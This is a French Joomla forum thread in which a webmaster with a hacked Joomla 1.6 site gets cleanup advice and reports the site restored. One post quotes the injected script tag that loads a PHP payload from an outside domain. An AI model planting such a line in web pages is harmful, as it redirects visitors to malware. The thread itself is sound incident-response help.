Site infecté.

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Site infecté.

    Bonjour,

    Je suis nouveaux sur le forum est sur Joomla. Je n'ai aucunes compétences d'administrateur. Je sais gérer les articles, mettre à jour le site. Je comprends très bien le principe et l'organisation de Joomla mais je n'y connais rien code.

    Mon problème viens de ceci:

    Cliquez sur l'image pour l'afficher en taille normale

Nom : Capture d’écran 2014-03-28 à 22.02.54.jpg 
Affichages : 1 
Taille : 20,8 Ko 
ID : 1820229

    Cliquez sur l'image pour l'afficher en taille normale

Nom : Capture d’écran 2014-03-28 à 22.03.16.jpg 
Affichages : 1 
Taille : 23,1 Ko 
ID : 1820230

    Cliquez sur l'image pour l'afficher en taille normale

Nom : Capture d’écran 2014-03-30 à 15.58.57.jpg 
Affichages : 1 
Taille : 33,7 Ko 
ID : 1820231

    J'ai déjà viré 2 utilisateurs qui étaient en admin. J'ai changé le mot de passe (qui était déjà très fort). Je sais qu'il y a un fichier, un code, quelque part qui provoquent tout ça mais je ne sais absolument pas ou regarder. Je suis sous Joomla 1.6.
    Je peux faire la maintenance moi meme si je sais ou regarder et quoi chercher.

    Merci

  • #2
    Re : Site infecté.

    Bienvenue !

    La version 1.6 est obsolète depuis un bon moment, et comme elle n'a pas été mise à jour et 1.7 puis 2.5, elle présente des failles de sécurité qu'un pirate a pu exploiter.
    Teste le site avec sucuri.net qui te donnera des indications sur ce qui a été ajouté (faute de décrypter le nom de domaine, je n'ia pas pu le vérifier moi-même), puis donne-nous ces informations complémentaires.

    L'idéal serait de retrouver une sauvegarde saine pour la restaurer après avoir totalement vidé le site piraté, puis de migrer au plus vite en version 2.5 !
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide). MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info hébergés chez PHPNET - +sites gérés chez 1and1 et OVH - Site pro : www.robertg-conseil.fr

    Commentaire


    • #3
      Re : Site infecté.

      Merci pour cette réponse très rapide.

      je viens de scanner les site avec sucuri.net. J'ai obtenu ce que je sais déjà, c'est dire que mon site est compromis. Sucuri.net ne m'a donné aucunes precisions. Est-ce que les fonctions premium de sucuri.net peuvent m'êtres utiles et désinfecter mon site?
      Je pourrais par la suite faire une mis à jour vers 2.5.

      Commentaire


      • #4
        Re : Site infecté.

        Sucuri.net donne pourtant des infos utilisables, type scripts qui ne devraient pas être présents.
        Peux-tu donner l'adresse du site ?

        Je n'ai personnellement jamais fait appel aux fonctions payantes de Sucuri.net, les onglets donnant suffisamment de renseignements, en général, pour à peu près savoir.

        Mais comme je l'ai dit, souvent le plus simple est de vider le répertoire du site pour y remettre une version saine précédemment sauvegardée.
        Dernière édition par RobertG à 30/03/2014, 18h22
        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide). MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info hébergés chez PHPNET - +sites gérés chez 1and1 et OVH - Site pro : www.robertg-conseil.fr

        Commentaire


        • #5
          Re : Site infecté.

          Envoyé par RobertG Voir le message
          Sucuri.net donne pourtant des infos utilisables, type scripts qui ne devraient pas être présents.
          Peux-tu donner l'adresse du site ?

          Je n'ai personnellement jamais fait appel aux fonctions payantes de Sucuri.net, les onglets donnant suffisamment de renseignements, en général, pour à peu près savoir.

          Mais comme je l'ai dit, souvent le plus simple est de vider le répertoire du site pour y remettre une version saine précédemment sauvegardée.

          Voici l'adresse du site:
          maliabendimerad.com

          I y a aussi malibendimerad.fr et malia.fr qui pointe sur le principal maliabendimerad.com

          J'ai aussi suivi les conseils de aeSecure, j'ai d'ailleurs installé le module.
          J'ai aussi consulté le dates des fichiers, car je suppose que cela correspond souvent à la date de la dernière modif. Le problème c'est qu'il doit y avoir des modifs provoquées par le système lui même et des modifs provoquées par une personne, non?
          J'ai trouvé le dossier mod_fxprev avec une date au 28. Si cette date indique que le dossier a été modifié par une personne je viens de trouver un problème?

          (MAJ)
          Je viens d'utiliser le "webmasters tools security" et j'ai les details des fichiers infectés. Je vais voir d'abord si je peux me débrouiller tout seul
          Dernière édition par prommix à 30/03/2014, 19h36

          Commentaire


          • #6
            Re : Site infecté.

            Voilà l'analyse de Googe web masters tools

            Logiciel malveillant non reconnu
            Ces pages redirigent les internautes vers un site qui comporte des logiciels malveillants. Malheureusement, le code malveillant présent dans la page n'a pu être isolé.
            Afficher les détails
            Exemples d'URL Dernière détection
            http://maliabendimerad.com/ -
            http://www.maliabendimerad.com/ -
            http://maliabendimerad.com/index.php -
            http://maliabendimerad.com/media.php -
            http://maliabendimerad.com/index.php/ -
            http://www.maliabendimerad.com/index.php -
            http://www.maliabendimerad.com/media.php -
            http://www.maliabendimerad.com/index.php/ -
            http://maliabendimerad.com/?lang=EN -
            http://maliabendimerad.com/?lang=FR -


            Injection de code de logiciel malveillant
            Ces pages redirigent les internautes vers un site qui comporte des logiciels malveillants.
            Afficher les détails
            Exemples d'URL Dernière détection
            http://maliabendimerad.com/index.php/en/ 28/03/2014
            http://maliabendimerad.com/index.php/fr/multimedia 28/03/2014
            http://www.maliabendimerad.com/index.php/en/ 28/03/2014
            http://www.maliabendimerad.com/index.php/en/?lang=EN 28/03/2014
            http://www.maliabendimerad.com/index.php/en/?lang=FR 28/03/2014
            http://www.maliabendimerad.com/index.php/en/biography 28/03/2014
            http://www.maliabendimerad.com/index.php/en/contact 28/03/2014
            http://www.maliabendimerad.com/index.php/en/medias 28/03/2014
            http://www.maliabendimerad.com/index.php/en/pictures 28/03/2014
            http://www.maliabendimerad.com/index.php/en/press 28/03/2014

            Un exemple plus précis

            http://maliabendimerad.com/index.php/en/
            Extrait suspect
            <script type="text/javascript" src="http://thebigthreebook.com/QwYygBKV.php?id=">


            Je viens d'installer et de lancer JAMSS en "deep scan". J'essaye de comprendre les résultats et notamment celui-ci

            In file ./.htaccess-> we found 1 occurence(s) of String 'system'

            J'utilise Transmit pour accéder aux fichiers du site mais je ne trouve pas ce chemin.
            Finalement trouvé, il fallait activer la visibilité des dossiers cachés dans Transmit.
            Dernière édition par prommix à 31/03/2014, 10h08

            Commentaire


            • #7
              Re : Site infecté.

              un classique malheureusement assez ch...t à désinfecter car le code à été inséré probablement par une commande find en ssh qui consiste grosso modo à prendre tout les fichiers .php et y insérer ce code...

              dans un premier temps, tu peux uploader un joomla clean qui aura pour effet d'écraser ces insertions..

              ensuite, reste à désinfecter les fichiers qui ne font pas partie du pack joomla, tu peux le faire en ssh ou manuellement, bon courage
              Christophe
              http://www.webcrea.fr

              Commentaire


              • #8
                Re : Site infecté.

                Envoyé par webcrea Voir le message
                un classique malheureusement assez ch...t à désinfecter car le code à été inséré probablement par une commande find en ssh qui consiste grosso modo à prendre tout les fichiers .php et y insérer ce code...

                dans un premier temps, tu peux uploader un joomla clean qui aura pour effet d'écraser ces insertions..

                ensuite, reste à désinfecter les fichiers qui ne font pas partie du pack joomla, tu peux le faire en ssh ou manuellement, bon courage

                Merci, je vais en avoir besoin.
                Bon, j'ai demandé au créateur du site de m'envoyer une copie saine (j'espère qu'il en a gardé une). Je vais mettre à jour Joomla en 2.5 et reinstaller tout ça.
                Une dernière question avant les grands travaux. Pour faire une sauvegarde de mon site, il suffit que je copie tous les fichiers que mon client FTP (Transmit) me montre? Je sens que c'est n'est pas si simple...

                Commentaire


                • #9
                  Re : Site infecté.

                  Il te faut aussi sauvegarder la base de données, car sans elle, pas de site.
                  "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide). MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info hébergés chez PHPNET - +sites gérés chez 1and1 et OVH - Site pro : www.robertg-conseil.fr

                  Commentaire


                  • #10
                    Re : Site infecté.

                    Je viens de me connecter à ma gestion des bases de données via PHPadmin. Dans l'onglet "exportation" j'ai sélectionné tous les "users",j'ai sélectionné SQL, coché "transmettre" et j'ai obtenu un fichier mysql10.sql . Je me suis ensuite aperçu que seul moi, mon "user", comportait la base des données, les autres étants vides. J'ai alors recommencé l'opération en sélectionnant dans le menu déroulant mon "user" et là il y avait des fichiers jmal_ que j'ai sélectionné. J'ai donc utilisé le même procédé et j'ai obtenu un fichier userXXXXX.sql

                    J'espère que cette "Base de données" n'est pas touchée par l'infection. Il aurait fallu que les personnes aient accès à mon hébergeur et s'identifier. Enfin si j'ai bien compris.
                    Dernière édition par prommix à 31/03/2014, 11h28

                    Commentaire


                    • #11
                      Re : Site infecté.

                      Je ne parlais pas de faire une réinstall mais juste un upload d'un joomla sain... sans le répertoire installation...
                      tu n'as pas besoin de toucher à la base
                      Christophe
                      http://www.webcrea.fr

                      Commentaire


                      • #12
                        Re : Site infecté.

                        Envoyé par prommix Voir le message
                        Je viens de me connecter à ma gestion des bases de données via PHPadmin. Dans l'onglet "exportation" j'ai sélectionné tous les "users",j'ai sélectionné SQL, coché "transmettre" et j'ai obtenu un fichier mysql10.sql . Je me suis ensuite aperçu que seul moi, mon "user", comportait la base des données, les autres étants vides. J'ai alors recommencé l'opération en sélectionnant dans le menu déroulant mon "user" et là il y avait des fichiers jmal_ que j'ai sélectionné. J'ai donc utilisé le même procédé et j'ai obtenu un fichier userXXXXX.sql

                        J'espère que cette "Base de données" n'est pas touchée par l'infection. Il aurait fallu que les personnes aient accès à mon hébergeur et s'identifier. Enfin si j'ai bien compris.
                        J'ai du mal à comprendre ce que tu as pu exporter, mais manifestement, ça ne semble pas du tout correspondre à la totalité des tables d'un site Joomla!
                        Il faut que tu sélectionnes le nom de la base dans la colonne de gauche de phpMyAdmin, puis que tu cliques à droite sur "exporter" et que tu sélectionnes toutes les tables dont le préfixe est défini dans le fichier "configuration.php", à la racine du site.
                        Sans procéder de cette manière, il y a toutes chances pour que tu aies une sauvegarde incomplète de la base.
                        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide). MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info hébergés chez PHPNET - +sites gérés chez 1and1 et OVH - Site pro : www.robertg-conseil.fr

                        Commentaire


                        • #13
                          Re : Site infecté.

                          Hier.
                          Mise à jours du site en 2.5, installation du module aeSecure et envoie d'une demande à Google d'effacement du "blacklisting".

                          Aujourd'hui
                          Tout fonctionne à merveille, juste quelques bugs d'affichage qui doivent provenir de la maj et que je vais régler rapidement.

                          Merci pour votre aide et vos conseils

                          Commentaire


                          • #14
                            Re : Site infecté.

                            Bonjour

                            Envoyé par prommix Voir le message
                            Tout fonctionne à merveille, juste quelques bugs d'affichage qui doivent provenir de la maj et que je vais régler rapidement.
                            Il est donc grand temps (si cela n'est pas encore fait) de prendre un backup de ton site et d'installer un logiciel de protection qui aura pour mission de bloquer un maximum d'attaques. aeSecure propose ces protections; voir ma signature.

                            Tu pourras activer un très grand nombre de blocages puis, individuellement, activer telle ou telle protection spécifique comme, p.ex. sur un site n'évoluant pas ou plus beaucoup, bloquer l'upload ==> si pas d'upload, impossibilité d'installer sur ton site une bestiole (à moins que la bestiole passe par un autre site web; hebergé sur le même serveur). Avec aeSecure, tu fermeras un très grand nombre de portes et de fenêtres.

                            Bonne journée.
                            Christophe (cavo789)
                            Développeur d'aeSecure; protection, optimisation et nettoyage (après hack) de sites web Apache https://www.aesecure.com/fr
                            Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes

                            Commentaire


                            • #15
                              Re : Site infecté.

                              Envoyé par cavo789 Voir le message
                              Bonjour



                              Il est donc grand temps (si cela n'est pas encore fait) de prendre un backup de ton site et d'installer un logiciel de protection qui aura pour mission de bloquer un maximum d'attaques. aeSecure propose ces protections; voir ma signature.

                              Tu pourras activer un très grand nombre de blocages puis, individuellement, activer telle ou telle protection spécifique comme, p.ex. sur un site n'évoluant pas ou plus beaucoup, bloquer l'upload ==> si pas d'upload, impossibilité d'installer sur ton site une bestiole (à moins que la bestiole passe par un autre site web; hebergé sur le même serveur). Avec aeSecure, tu fermeras un très grand nombre de portes et de fenêtres.

                              Bonne journée.
                              J'ai déjà installé aeSecure (c'est la première chose que j'ai faite) et j'ai récupéré un backup.

                              Merci

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X